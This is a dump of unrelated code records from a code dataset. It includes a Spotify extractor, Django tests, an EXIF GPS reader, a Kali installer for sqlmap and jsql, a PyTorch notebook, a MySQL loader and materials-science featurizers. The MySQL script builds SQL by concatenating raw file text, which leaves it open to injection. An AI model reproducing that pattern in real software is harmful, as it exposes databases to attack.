spotipy\nimport spotipy.oauth2 as oauth2\nimport re\n\nCLI_ID = \"c031db81e9e841c382309dac036c36ae\"\n# CLI_ID = \"6091268a186e4c6996198bf7749090e2\"\nCLI_KEY = os.environ.get(\"spotifyDiscordBotSecret\")\nif CLI_KEY is None:\n    print(\"You have not added the spotify Client secret as an environment variable. Exiting.\")\n    sys.exit()\n\ndef get_token():\n    \"\"\" Returns an access token that is to be sent to the spotify Web API upon every request.\"\"\"\n    credentials = oauth2.SpotifyClientCredentials(\n        client_id = CLI_ID, \n        client_secret = CLI_KEY)\n    token = credentials.get_access_token()\n    return token \n\ndef extract_playlist_id(playlist_url):\n    # If the user passes in an HTML link\n    if playlist_url.startswith(\"https\") or playlist_url.startswith(\"open.spotify\"):\n        playlist_id = re.search(\"playlist\\/(.*)\\?\", playlist_url)\n        if playlist_id is None:\n            playlist_id = re.search(\"playlist\\/(.*)\", playlist_url)\n        playlist_id = playlist_id.group(1)\n        return playlist_id\n\n    # The user passes in a spotify URI \n    if playlist_url.startswith(\"spotify:playlist\"):\n        playlist_id = re.search(\"playlist:(.*)\", playlist_url).group(1)\n        return playlist_id\n    \n    # Else, the playlist_url is invalid\n    return None\n\ndef get_songs_from_album(playlist_url):\n    \"\"\" Given a PLAYLIST_URL, this function will query the spotify API (via the spotipy library) \n    and return a list of all the songs present in that playlist\"\"\"\n    \n    # First, we must tell the spotify API who we are\n    token = get_token()\n    spotify = spotipy.Spotify(auth=token)\n    playlist_id = extract_playlist_id(playlist_url)\n\n    # Return None if the playlist_url was invalid\n    if playlist_id is None:\n        return None\n\n    playlist = spotify.playlist(playlist_id)\n    tracks = playlist[\"tracks\"]\n    song_artist_lst = list()\n\n    for item in tracks[\"items\"]:\n        song_name = item[\"track\"][\"name\"]\n        artist_name = item[\"track\"][\"artists\"][0][\"name\"]\n        song_artist_lst.append((song_name, artist_name))\n\n    print(song_artist_lst)\n    return song_artist_lst\n\n\n\n\n","sub_path":"discordBot/spotifyExtractor.py","file_name":"spotifyExtractor.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568854137","text":"import json\nimport jsonschema\n\nfrom django.core.management import call_command\nfrom django.test.client import Client\nfrom jsonschema import validate\nfrom io import StringIO\n\nfrom apps.test import BaseApiTest\n\nfrom .audit_logger_schemas import GLOBAL_STATE_METRICS_LOG_SCHEMA, GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA\n\n\nloggers = [\n    'audit.global_state_metrics'\n]\n\n\nclass TestLoggersGlobalMetricsManagementCommand(BaseApiTest):\n\n    def setUp(self):\n        # Setup the RequestFactory\n        self.client = Client()\n        self._redirect_loggers(loggers)\n\n    def tearDown(self):\n        self._cleanup_logger()\n\n    def _get_log_content(self, logger_name):\n        return self._collect_logs(loggers).get(logger_name)\n\n    def _validateJsonSchema(self, schema, content):\n        try:\n            validate(instance=content, schema=schema)\n        except jsonschema.exceptions.ValidationError as e:\n            # Show error info for debugging\n            print(\"jsonschema.exceptions.ValidationError: \", e)\n            return False\n        return True\n\n    def test_management_command_logging(self):\n        # Setup variety of real/synth users, apps and grants to test with using BaseApiTest helper function.\n        for i in range(0, 3):\n            user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n                                                              last_name=\"smith0\" + str(i),\n                                                              
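# NOTE: in these fixtures a positive fhir_id marks a real bene; the synthetic benes below use negative ids\n                                                              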
fhir_id=\"2000000000000\" + str(i),\n app_name=\"app0\",\n app_username=\"user_app0\")\n for i in range(0, 2):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith0\" + str(i),\n fhir_id=\"-2000000000000\" + str(i),\n app_name=\"app0\",\n app_username=\"user_app0\")\n for i in range(0, 2):\n user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n last_name=\"smith1\" + str(i),\n fhir_id=\"2000000000001\" + str(i),\n app_name=\"app1\",\n app_username=\"user_app1\")\n for i in range(0, 3):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith1\" + str(i),\n fhir_id=\"-2000000000001\" + str(i),\n app_name=\"app1\",\n app_username=\"user_app1\")\n for i in range(0, 5):\n user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"2000000000002\" + str(i),\n app_name=\"app2\",\n app_username=\"user_app2\")\n app.require_demographic_scopes = False\n app.save()\n for i in range(0, 7):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"-2000000000002\" + str(i),\n app_name=\"app2\",\n app_username=\"user_app2\")\n for i in range(0, 1):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"-2000000000003\" + str(i),\n app_name=\"app3\",\n app_username=\"user_app3\")\n app.active = False\n app.save()\n\n # Call management command\n call_command(\"log_global_state_metrics\", stdout=StringIO(), stderr=StringIO())\n\n # Get all log entries\n log_content = self._get_log_content('audit.global_state_metrics')\n self.assertIsNotNone(log_content)\n\n # Set buffer to read log lines from\n log_content_buf = StringIO(log_content)\n\n '''\n Validate 1st log line has:\n {'type': 'global_state_metrics',\n 'group_timestamp': '2021-06-11T18:50:14+00:00',\n 'real_bene_cnt': 10,\n 'synth_bene_cnt': 12,\n 'global_apps_active_cnt': 3,\n 'global_apps_inactive_cnt': 1,\n 'global_apps_require_demographic_scopes_cnt': 2}\n '''\n log_line = json.loads(log_content_buf.readline())\n self.assertTrue(self._validateJsonSchema(GLOBAL_STATE_METRICS_LOG_SCHEMA, log_line))\n\n # Per app expected value LISTs\n active_list = [True, True, True, False]\n require_demographic_scopes_list = [True, True, False, True]\n real_bene_cnt_list = [3, 2, 5, 0]\n synth_bene_cnt_list = [2, 3, 7, 1]\n\n # Validate per app log entries\n cnt = 0\n for log_line in log_content_buf.readlines():\n log_dict = json.loads(log_line)\n\n # Update Json Schema\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"name\"][\"pattern\"] = \"app{}\".format(cnt)\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"active\"][\"enum\"] = [active_list[cnt]]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"require_demographic_scopes\"][\"enum\"] = [\n require_demographic_scopes_list[cnt]\n ]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"real_bene_cnt\"][\"enum\"] = [real_bene_cnt_list[cnt]]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"synth_bene_cnt\"][\"enum\"] = [synth_bene_cnt_list[cnt]]\n\n # Validate with schema\n self.assertTrue(self._validateJsonSchema(GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA, log_dict))\n cnt = cnt + 
1\n","sub_path":"apps/logging/tests/test_loggers_management_command.py","file_name":"test_loggers_management_command.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115589000","text":"import webbrowser\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\n\ndef get_exif(fn):\n    print('[ + ]' + 'Checking metadata...' + '\\n')\n    try:\n        i = Image.open(fn)\n    except IOError:\n        print(\"Error: file not found\")\n        return -1\n\n    info = i._getexif()\n    if not info:\n        print(\"Metadata is not very informative:\")\n        return -1\n\n    ret = {}\n    for tag, value in info.items():\n        decoded = TAGS.get(tag, tag)\n        ret[decoded] = value\n\n    return ret\n\n\ndef gps_analyzer(img_path):\n    exif_data = get_exif(img_path)\n\n    if exif_data == -1:\n        return\n\n    for x, y in exif_data.items():\n        print(f\"{x} : {y}\")\n\n    gps_info = exif_data.get(\"GPSInfo\")\n\n    if gps_info:\n        lat = [float(x) / float(y) for x, y in gps_info[2]]\n        latref = gps_info[1]\n\n        lon = [float(x) / float(y) for x, y in gps_info[4]]\n        lonref = gps_info[3]\n\n        lat = lat[0] + lat[1] / 60 + lat[2] / 3600\n        lon = lon[0] + lon[1] / 60 + lon[2] / 3600\n        if latref == 'S':\n            lat = -lat\n        if lonref == 'W':\n            lon = -lon\n\n        map_it(lat, lon)\n\n    else:\n        print('')\n        print(\"GPS location not found\")\n\n\ndef map_it(lat, lon):\n    # Prints latitude and longitude values\n    print()\n    print(f\"Accurate Latitude : {lat}\")\n    print(f\"Accurate Longitude : {lon}\")\n    print()\n    # Prompts the user to launch a web browser with the map\n    query = f\"{lat},+{lon}\"\n    maps_url = f\"https://maps.google.com/maps?q={query}\"\n\n    openWeb = input(\"Open GPS location in web browser? (Y/N) \")\n    if openWeb.upper() == 'Y':\n        webbrowser.open(maps_url, new=2)\n","sub_path":"plugins/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476209197","text":"# to install database assessment tools\n# BY KAUNG KHANT ZAW\nimport os\nimport sys\nprint (''' /$$$$$$ \n /$$___$$ \n| $$ \\ $$ /$$$$$$$ /$$$$$$$$ /$$$$$$ /$$$$$$$ \n| $$$$$$$$ /$$_____/|____ /$$/ /$$__ $$| $$__ $$\n| $$__ $$| $$$$$$ /$$$$/ | $$ \\ $$| $$ \\ $$\n| $$ | $$ \\____ $$ /$$__/ | $$ | $$| $$ | $$\n| $$ | $$ /$$$$$$$/ /$$$$$$$$| $$$$$$/| $$ | $$\n|__/ |__/|_______/ |________/ \\______/ |__/ |__/''')\nprint (\"BY KAUNG KHANT ZAW\")\ndef fuc():\n    print ('''1. JSQL 	2. SQLMAP	 3. sqlite\n4. TO ALL PROGRAMS\n0. 
EXIT PROGRAM''')\n global num_num\n num_num = int(input('kali>>> '))\n if num_num == 1:\n os.system('sudo apt install jsql')\n elif num_num == 2:\n os.system('sudo apt install sqlmap')\n elif num_num == 3:\n os.system('sudo apt install sqlite')\n elif num_num == 4:\n os.system('sudo apt install jsql sqlmap sqlite')\n elif num_num == 0:\n exit()\n else:\n print('Invalid...')\nwhile True:\n fuc()\nelse:\n exit()\n","sub_path":"programs/database_assement.py","file_name":"database_assement.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517042346","text":"a = 10000\nprint(a)\nb = 10\nprint(b)\na = a+b\nprint(a)\nprint(b)\n\ndef AA(n):\n aa = 1+1+n\n return aa\n\ndef BB(n):\n bb = n*3\n return bb\n\nif __name__ == '__main__':\n print('test mode')\n","sub_path":"python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"12214603","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nprint(\"hello\")\n\n\n# %%\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nimport torch.utils.data as data\n\n\n# %%\ntrain_data_path = \"./train\"\ntransform = transforms.Compose([\n transforms.Resize((64, 64)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225])\n])\n\ntrain_data = torchvision.datasets.ImageFolder(root=train_data_path, transform=transform)\n\n\n# %%\ntransform\n\n\n# %%\nval_data_path = \"./val/\"\nval_data = torchvision.datasets.ImageFolder(root=val_data_path, transform=transform)\n\ntest_data_path = \"./test/\"\ntest_data = torchvision.datasets.ImageFolder(root=test_data_path, transform=transform)\n\n\n# %%\nbatch_size = 64\ntrain_data_loader = data.DataLoader(train_data, batch_size=batch_size)\nval_data_loader = data.DataLoader(val_data, batch_size=batch_size)\ntest_data_loader = data.DataLoader(test_data, batch_size=batch_size)\n\n\n# %%\nimage, label = next(iter(train_data_loader))\n\n\n# %%\nimage.shape, label.shape\n\n\n# %%\nclass SimpleNet(nn.Module):\n def __init__(self):\n super(SimpleNet, self).__init__()\n self.fc1 = nn.Linear(12288, 84)\n self.fc2 = nn.Linear(84, 50)\n self.fc3 = nn.Linear(50, 2)\n\n def forward(self, x):\n x = x.view(-1, 12288)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n \n\n\n# %%\nsimplenet = SimpleNet()\n\n\n# %%\nsimplenet\n\n\n# %%\nimport torch.optim as optim\noptimizer = optim.Adam(simplenet.parameters(), lr=0.001)\n\n\n# %%\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n# model.to(device)\n\n\n# %%\ndevice\n\n\n# %%\ndef train(model, optimizer, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n print(device)\n for epoch in range(epochs):\n training_loss = 0.0\n valid_loss = 0.0\n model.train()\n\n for batch in train_loader:\n optimizer.zero_grad()\n input, target = batch\n input = input.to(device)\n target = target.to(device)\n\n output = model(input)\n\n loss = loss_fn(output, target)\n loss.backward()\n optimizer.step()\n\n training_loss += loss.data.item()\n training_loss /= len(train_loader)\n\n model.eval()\n num_correct = 0\n num_examples = 0\n\n for batch in val_loader:\n input, target = batch\n input = input.to(device)\n output = 
model(input)\n\n target = target.to(device)\n\n loss = loss_fn(output, target)\n valid_loss += loss.data.item()\n\n correct = torch.eq(torch.max(F.softmax(output), dim=1)[1],\n\t\t\t\t\t\t\t target).view(-1)\n\n num_correct += torch.sum(correct).item()\n num_examples += correct.shape[0]\n\n valid_loss /= len(val_loader)\n\n print(\"Epoch: {}, Training Loss: {:.2f}, Validation Loss: {:.2f}, accuracy = {:.2f}\".format(epoch, training_loss,\n valid_loss, num_correct / num_examples))\n\n\n# %%\ndevice\n\n\n# %%\ntrain(simplenet, optimizer, torch.nn.CrossEntropyLoss(),train_data_loader, val_data_loader, 20, device)\n\n\n# %%\n\n\n\n# %%\n\n\n","sub_path":"chapter2/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"28298900","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n\"\"\"Function implementation\n test with: resilient-circuits selftest -l fn_proofpoint_campaign\n\"\"\"\n\nimport logging\nimport os\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler())\n\n\ndef get_config_option(option_name, opts, optional=False):\n \"\"\"Given option_name, check if it is in appconfig.\n Raises ValueError if it is missing and mandatory.\n \"\"\"\n option = opts.get(option_name)\n\n if not option and not optional:\n err = '\"{0}\" is mandatory and not set in the app.config file.'.format(option_name)\n raise ValueError(err)\n else:\n return option\n\n\ndef selftest_function(opts):\n \"\"\"\n Placeholder for selftest function. An example use would be to test package api connectivity.\n Suggested return values are be unimplemented, success, or failure.\n \"\"\"\n options = opts.get('fn_proofpoint', {})\n\n base_url = get_config_option('base_url', options)\n username = get_config_option('username', options)\n password = get_config_option('password', options)\n cafile = options.get('cafile')\n bundle = os.path.expanduser(cafile) if cafile else False\n\n basic_auth = HTTPBasicAuth(username, password)\n url = '{0}/bad'.format(base_url)\n\n try:\n res = requests.get(\n url,\n auth=basic_auth,\n verify=bundle\n )\n\n res.raise_for_status()\n\n if res.status_code == 200:\n return {'state': 'success'}\n\n return {\n 'state': 'failure',\n 'reason': 'status code {0}'.format(res.status_code)\n }\n\n except Exception as ex:\n log.error(ex)\n return {\n 'state': 'failure',\n 'reason': ex\n }\n","sub_path":"fn_proofpoint/fn_proofpoint/util/selftest.py","file_name":"selftest.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"41919159","text":"# Copyright 2017 Red Hat, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import render_template, Blueprint, current_app, redirect, url_for\nfrom ara import models, utils\n\nreports = Blueprint('reports', __name__)\n\n\n@reports.route('/')\n@reports.route('/')\ndef report_list(page=1):\n if current_app.config['ARA_PLAYBOOK_OVERRIDE'] is not None:\n override = current_app.config['ARA_PLAYBOOK_OVERRIDE']\n playbooks = (models.Playbook.query\n .filter(models.Playbook.id.in_(override))\n .order_by(models.Playbook.time_start.desc()))\n else:\n playbooks = (models.Playbook.query\n .order_by(models.Playbook.time_start.desc()))\n\n if not playbooks.count():\n return redirect(url_for('home.main'))\n\n playbook_per_page = current_app.config['ARA_PLAYBOOK_PER_PAGE']\n # Paginate unless playbook_per_page is set to 0\n if playbook_per_page >= 1:\n playbooks = playbooks.paginate(page, playbook_per_page, False)\n else:\n playbooks = playbooks.paginate(page, None, False)\n\n stats = utils.get_summary_stats(playbooks.items, 'playbook_id')\n\n result_per_page = current_app.config['ARA_RESULT_PER_PAGE']\n\n return render_template('report_list.html',\n active='reports',\n result_per_page=result_per_page,\n playbooks=playbooks,\n stats=stats)\n","sub_path":"ara/views/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349210071","text":"from __future__ import print_function\r\nimport re\r\n\r\nfrom datetime import date, datetime, timedelta\r\nimport mysql.connector\r\n\r\nvalues=[]\r\n\r\n\r\nwith open ('save4.txt', 'r') as f:\r\n for rec in f:\r\n a= (rec.split(': ')[1])\r\n values.append(a)\r\n\r\nfor word in values:\r\n print (word)\r\n\r\ncnx = mysql.connector.connect(user='root',password = 'root', database='dbname')\r\ncursor = cnx.cursor()\r\n\r\nquery = \"INSERT INTO adas VALUES (\"\r\n\r\nwordLed=len(values)\r\nfor i in range(0,wordLed):\r\n #query = query + \"',\"\r\n query = query + values[i]\r\n\r\nquery = query + \")\"\r\n\r\nquery = (query.split('}')[0])\r\nquery= query+\")\"\r\n\r\nprint(query)\r\n\r\ncursor.execute(query)\r\n\r\n\r\n# Make sure data is committed to the database\r\ncnx.commit()\r\ncursor.close()\r\ncnx.close()\r\n\r\n\r\n","sub_path":"dbsingal.py","file_name":"dbsingal.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289496033","text":"from __future__ import division, unicode_literals, print_function\n\nimport math\nimport itertools\nfrom operator import itemgetter\n\nimport numpy as np\nfrom scipy.stats import gaussian_kde\nfrom pymatgen.analysis.diffraction.xrd import XRDCalculator\nfrom pymatgen.analysis.local_env import ValenceIonicRadiusEvaluator\nfrom pymatgen.core.periodic_table import Specie, Element\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom matminer.featurizers.base import BaseFeaturizer\n\n\nclass RadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Calculate the radial distribution function (RDF) of a crystal structure.\n\n Features:\n - Radial distribution function\n\n Args:\n cutoff: (float) distance up to which to calculate the RDF.\n bin_size: (float) size of each bin of the (discrete) RDF.\n \"\"\"\n\n def __init__(self, cutoff=20.0, bin_size=0.1):\n self.cutoff = cutoff\n self.bin_size = bin_size\n\n def featurize(self, s):\n \"\"\"\n Get RDF of the input 
structure.\n Args:\n s (Structure): Pymatgen Structure object.\n\n Returns:\n rdf, dist: (tuple of arrays) the first element is the\n normalized RDF, whereas the second element is\n the inner radius of the RDF bin.\n \"\"\"\n if not s.is_ordered:\n raise ValueError(\"Disordered structure support not built yet\")\n\n # Get the distances between all atoms\n neighbors_lst = s.get_all_neighbors(self.cutoff)\n all_distances = np.concatenate(\n tuple(map(lambda x: [itemgetter(1)(e) for e in x], neighbors_lst)))\n\n # Compute a histogram\n dist_hist, dist_bins = np.histogram(\n all_distances, bins=np.arange(\n 0, self.cutoff + self.bin_size, self.bin_size), density=False)\n\n # Normalize counts\n shell_vol = 4.0 / 3.0 * math.pi * (np.power(\n dist_bins[1:], 3) - np.power(dist_bins[:-1], 3))\n number_density = s.num_sites / s.volume\n rdf = dist_hist / shell_vol / number_density\n return [{'distances': dist_bins[:-1], 'distribution': rdf}]\n\n def feature_labels(self):\n return [\"radial distribution function\"]\n\n def citations(self):\n return []\n\n def implementors(self):\n return [\"Saurabh Bajaj\"]\n\n\nclass PartialRadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Compute the partial radial distribution function (PRDF) of an xtal structure\n\n The PRDF of a crystal structure is the radial distibution function broken\n down for each pair of atom types. The PRDF was proposed as a structural\n descriptor by [Schutt *et al.*]\n (https://journals.aps.org/prb/abstract/10.1103/PhysRevB.89.205118)\n\n Args:\n cutoff: (float) distance up to which to calculate the RDF.\n bin_size: (float) size of each bin of the (discrete) RDF.\n include_elems: (list of string), list of elements that must be included in PRDF\n exclude_elems: (list of string), list of elmeents that should not be included in PRDF\n\n Features:\n Each feature corresponds to the density of number of bonds\n for a certain pair of elements at a certain range of\n distances. For example, \"Al-Al PRDF r=1.00-1.50\" corresponds\n to the density of Al-Al bonds between 1 and 1.5 distance units\n By default, this featurizer generates RDFs for each pair\n of elements in the training set.\"\"\"\n\n def __init__(self, cutoff=20.0, bin_size=0.1, include_elems=(),\n exclude_elems=()):\n self.cutoff = cutoff\n self.bin_size = bin_size\n self.elements_ = None\n self.include_elems = list(\n include_elems) # Makes sure the element lists are ordered\n self.exclude_elems = list(exclude_elems)\n\n def fit(self, X, y=None):\n \"\"\"Define the list of elements to be included in the PRDF. By default,\n the PRDF will include all of the elements in `X`\n\n Args:\n X: (numpy array nx1) structures used in the training set. 
Each entry\n must be Pymatgen Structure objects.\n y: *Not used*\n fit_kwargs: *not used*\n\n Returns:\n self\n \"\"\"\n\n # Initialize list with included elements\n elements = set([Element(e) for e in self.include_elems])\n\n # Get all of elements that appaer\n for strc in X:\n elements.update([e.element if isinstance(e, Specie) else e for e in\n strc.composition.keys()])\n\n # Remove the elements excluded by the user\n elements.difference_update([Element(e) for e in self.exclude_elems])\n\n # Store the elements\n self.elements_ = [e.symbol for e in sorted(elements)]\n\n return self\n\n def featurize(self, s):\n \"\"\"\n Get PRDF of the input structure.\n Args:\n s: Pymatgen Structure object.\n\n Returns:\n prdf, dist: (tuple of arrays) the first element is a\n dictionary where keys are tuples of element\n names and values are PRDFs.\n \"\"\"\n\n if not s.is_ordered:\n raise ValueError(\"Disordered structure support not built yet\")\n if self.elements_ is None:\n raise Exception(\"You must run 'fit' first!\")\n\n dist_bins, prdf = self.compute_prdf(\n s) # Assemble the PRDF for each pair\n\n # Convert the PRDF into a feature array\n zeros = np.zeros_like(dist_bins) # Zeros if elements don't appear\n output = []\n for key in itertools.combinations_with_replacement(self.elements_, 2):\n output.append(prdf.get(key, zeros))\n\n # Stack them together\n return np.hstack(output)\n\n def compute_prdf(self, s):\n \"\"\"Compute the PRDF for a structure\n\n Args:\n s: (Structure), structure to be evaluated\n Returns:\n dist_bins - float, start of each of the bins\n prdf - dict, where the keys is a pair of elements (strings),\n and the value is the radial distribution function for\n those paris of elements\n \"\"\"\n # Get the composition of the array\n composition = s.composition.fractional_composition.to_reduced_dict\n\n # Get the distances between all atoms\n neighbors_lst = s.get_all_neighbors(self.cutoff)\n\n # Sort neighbors by type\n distances_by_type = {}\n for p in itertools.product(composition.keys(), composition.keys()):\n distances_by_type[p] = []\n\n def get_symbol(site):\n if isinstance(site.specie, Element):\n return site.specie.symbol\n else:\n return site.specie.element.symbol\n\n # Each list is a list for each site\n for site, nlst in zip(s.sites, neighbors_lst):\n my_elem = get_symbol(site)\n\n for neighbor in nlst:\n rij = neighbor[1]\n n_elem = get_symbol(neighbor[0])\n # LW 3May17: Any better ideas than appending each element at a time?\n distances_by_type[(my_elem, n_elem)].append(rij)\n\n # Compute and normalize the prdfs\n prdf = {}\n dist_bins = self._make_bins()\n shell_volume = 4.0 / 3.0 * math.pi * (\n np.power(dist_bins[1:], 3) - np.power(dist_bins[:-1], 3))\n for key, distances in distances_by_type.items():\n # Compute histogram of distances\n dist_hist, dist_bins = np.histogram(distances, bins=dist_bins,\n density=False)\n # Normalize\n n_alpha = composition[key[0]] * s.num_sites\n rdf = dist_hist / shell_volume / n_alpha\n\n prdf[key] = rdf\n\n return dist_bins[:-1], prdf\n\n def _make_bins(self):\n \"\"\"Generate the edges of the bins for the PRDF\n\n Returns:\n [list of float], edges of the bins\n \"\"\"\n return np.arange(0, self.cutoff + self.bin_size, self.bin_size)\n\n def feature_labels(self):\n if self.elements_ is None:\n raise Exception(\"You must run 'fit' first!\")\n bin_edges = self._make_bins()\n labels = []\n for e1, e2 in itertools.combinations_with_replacement(self.elements_,\n 2):\n for r_start, r_end in zip(bin_edges, bin_edges[1:]):\n 
labels.append(\"{}-{} PRDF r={:.2f}-{:.2f}\".format(\n e1, e2, r_start, r_end\n ))\n return labels\n\n def citations(self):\n return [\"@article{Schutt2014,\"\n \"author = {Sch{\\\"{u}}tt, K. T. and Glawe, H. and Brockherde, F. \"\n \"and Sanna, A. and M{\\\"{u}}ller, K. R. and Gross, E. K. U.},\"\n \"doi = {10.1103/PhysRevB.89.205118},\"\n \"journal = {Physical Review B},\"\n \"month = {may},number = {20},pages = {205118},\"\n \"title = {{How to represent crystal structures for machine learning:\"\n \" Towards fast prediction of electronic properties}},\"\n \"url = {http://link.aps.org/doi/10.1103/PhysRevB.89.205118},\"\n \"volume = {89},\"\"year = {2014}}\"]\n\n def implementors(self):\n return [\"Logan Ward\", \"Saurabh Bajaj\"]\n\n\nclass ElectronicRadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Calculate the inherent electronic radial distribution function (ReDF)\n\n The ReDF is defined according to Willighagen et al., Acta Cryst., 2005, B61,\n 29-36.\n\n The ReDF is a structure-integral RDF (i.e., summed over\n all sites) in which the positions of neighboring sites\n are weighted by electrostatic interactions inferred\n from atomic partial charges. Atomic charges are obtained\n from the ValenceIonicRadiusEvaluator class.\n\n Args:\n cutoff: (float) distance up to which the ReDF is to be\n calculated (default: longest diagaonal in\n primitive cell).\n dr: (float) width of bins (\"x\"-axis) of ReDF (default: 0.05 A).\n \"\"\"\n\n def __init__(self, cutoff=None, dr=0.05):\n self.cutoff = cutoff\n self.dr = dr\n\n def featurize(self, s):\n \"\"\"\n Get ReDF of input structure.\n\n Args:\n s: input Structure object.\n\n Returns: (dict) a copy of the electronic radial distribution\n functions (ReDF) as a dictionary. The distance list\n (\"x\"-axis values of ReDF) can be accessed via key\n 'distances'; the ReDF itself is accessible via key\n 'redf'.\n \"\"\"\n if self.dr <= 0:\n raise ValueError(\"width of bins for ReDF must be >0\")\n\n # Make structure primitive.\n struct = SpacegroupAnalyzer(s).find_primitive() or s\n\n # Add oxidation states.\n struct = ValenceIonicRadiusEvaluator(struct).structure\n\n if self.cutoff is None:\n # Set cutoff to longest diagonal.\n a = struct.lattice.matrix[0]\n b = struct.lattice.matrix[1]\n c = struct.lattice.matrix[2]\n self.cutoff = max(\n [np.linalg.norm(a + b + c), np.linalg.norm(-a + b + c),\n np.linalg.norm(a - b + c), np.linalg.norm(a + b - c)])\n\n nbins = int(self.cutoff / self.dr) + 1\n redf_dict = {\"distances\": np.array(\n [(i + 0.5) * self.dr for i in range(nbins)]),\n \"distribution\": np.zeros(nbins, dtype=np.float)}\n\n for site in struct.sites:\n this_charge = float(site.specie.oxi_state)\n neighbors = struct.get_neighbors(site, self.cutoff)\n for nnsite, dist, *_ in neighbors:\n neigh_charge = float(nnsite.specie.oxi_state)\n bin_index = int(dist / self.dr)\n redf_dict[\"distribution\"][bin_index] \\\n += (this_charge * neigh_charge) / (struct.num_sites * dist)\n\n return [redf_dict]\n\n def feature_labels(self):\n return [\"electronic radial distribution function\"]\n\n def citations(self):\n return [\"@article{title={Method for the computational comparison\"\n \" of crystal structures}, volume={B61}, pages={29-36},\"\n \" DOI={10.1107/S0108768104028344},\"\n \" journal={Acta Crystallographica Section B},\"\n \" author={Willighagen, E. L. and Wehrens, R. and Verwer,\"\n \" P. and de Gelder R. and Buydens, L. M. C.}, year={2005}}\"]\n\n def implementors(self):\n return [\"Nils E. R. 
Zimmermann\"]\n\n\nclass XRDPowderPattern(BaseFeaturizer):\n \"\"\"\n 1D array representing powder diffraction of a structure as calculated by\n pymatgen. The powder is smeared / normalized according to gaussian_kde.\n\n NOTE comprhys: placed in distribution as the rdf and ssf are related by\n a fourier transform.\n \"\"\"\n\n def __init__(self, two_theta_range=(0, 127), bw_method=0.05,\n pattern_length=None, **kwargs):\n \"\"\"\n Initialize the featurizer.\n\n Args:\n two_theta_range ([float of length 2]): Tuple for range of\n two_thetas to calculate in degrees. Defaults to (0, 90). Set to\n None if you want all diffracted beams within the limiting\n sphere of radius 2 / wavelength.\n bw_method (float): how much to smear the XRD pattern\n pattern_length (float): length of final array; defaults to one value\n per degree (i.e. two_theta_range + 1)\n **kwargs: any other arguments to pass into pymatgen's XRDCalculator,\n such as the type of radiation.\n \"\"\"\n self.two_theta_range = two_theta_range\n self.bw_method = bw_method\n self.pattern_length = pattern_length or two_theta_range[1] - \\\n two_theta_range[0] + 1\n self.xrd_calc = XRDCalculator(**kwargs)\n\n def featurize(self, strc):\n pattern = self.xrd_calc.get_pattern(\n strc, two_theta_range=self.two_theta_range)\n 